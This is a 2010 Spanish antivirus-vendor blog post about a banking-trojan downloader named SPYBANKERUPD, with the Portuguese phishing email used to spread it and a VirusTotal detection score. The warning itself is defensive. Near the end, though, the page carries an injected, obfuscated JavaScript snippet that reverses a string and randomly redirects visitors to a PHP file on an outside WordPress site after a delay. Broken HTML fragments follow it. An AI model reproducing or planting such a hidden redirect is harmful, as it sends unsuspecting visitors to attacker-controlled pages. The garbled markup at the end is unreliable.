Nuevo downloader de Banker que aun detectan muy pocos antivirus (7 de 41)
Se trata de una variante de una familia de downloaders que identificamos como SPYBANKERUPD , que cada variante usa diferente nombre de fichero malware, y que instala una copia del downloader en una ruta diferente cada version, pero aiempre lo llama UPD.EXE
Típicamente vienen en mails en portugúes,desde Brasil, de donde probablemente es original:
____________
Asunto: Favor responder até 05/09/2010
De: Pedido de orçamento.
Fecha: Wed, 25 Aug 2010 05:43:48 -0300
Para: <destinatario>
1 anexo:
…..Orçamento.zip (23,8KB)
Olá, estamos fazendo uma pesquisa de preços,
e gostaria de saber o valor deste orçamento.
Obs.: (Favor encaminhar resposta para orcamento@fixavisual.com.br até dia 05/09/2010)
Aguardo Resposta.
Atenciosamente,
…
3619-2342/ 9131-5223
<remitente>@terra.com.br
_______________
El analisis con el VirusTotal ofrece actualmente este resultado:
|
File name:
orcamento.exe Submission date:
2010-08-25 11:06:57 (UTC) Current status:
finished Result:
7 /41 (17.1%) |
VT Community
y lo pasamos a controlar como SPYBANKERUPD, como una variante mas (ya van 7) de las que hacen lo mismo, pero con otra ruta de carga y diferentes detalles, propios de cada version. A partir del ELISTARA 21.47 QUE ESTARÁ DISPONIBLE A LAS 15 H, ya controlaremos y eliminaremos este malware Mucho cuidado que se trata de un descargador de BANKER, de los que quedan residentes y capturan claves bancarias que envian a los autores del malware… saludos ms, 25-8-2010 __________
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es __________ Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo. Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
|
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>total.hispasecsistemas.netdna-cdn.com/img/malware.png” alt=”” /><br />
malware<br />
Safety score: 0.0% </td>
</tr>
</tbody>
</table>
<div>
<div>
<div><a href=)
Compact
Siguenos
en facebook
Los comentarios están cerrados.